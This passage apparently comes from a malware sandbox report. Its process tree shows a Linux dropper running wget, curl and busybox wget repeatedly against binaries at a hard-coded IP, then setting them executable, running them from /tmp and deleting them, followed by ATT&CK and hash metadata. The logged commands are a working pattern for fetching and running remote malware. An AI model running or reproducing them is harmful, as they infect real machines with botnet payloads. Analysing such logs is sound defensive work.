- File and Directory Permissions Modification
PID:947
-
-
/tmp/ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX./ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm ZLetAjEE6x1Vy5KYW3ilFr8LIdj9l2FyDX2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:952
-
-
/bin/chmodchmod 777 vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr./vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm vUzmbkLKiJSe2UWtRMSQajqF4vAhcaudwr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:958
-
-
/bin/chmodchmod 777 Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/Uct3UXZOStpcEQOi547zU11rNtbHTrF9t9./Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm Uct3UXZOStpcEQOi547zU11rNtbHTrF9t92⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:964
-
-
/bin/chmodchmod 777 ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ./ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm ok1YcZzIvtxcalOu8yyruBGGbVw364rKxQ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:970
-
-
/bin/chmodchmod 777 yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD0./yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm yjmswWpjUKTj0JKs4jWHeBrITHQbe1FJD02⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:976
-
-
/bin/chmodchmod 777 jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM./jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm jlx9wjJis8xVNUGKkKgLSsz5xOjvweHixM2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:982
-
-
/bin/chmodchmod 777 LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv./LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm LyTqA7xFIVBJENEssCjNnfeXS9CCKGFknv2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:988
-
-
/bin/chmodchmod 777 x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB./x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm x7YC4D8bGXzkqUb0cTbfDXVjbQTMF4wRdB2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97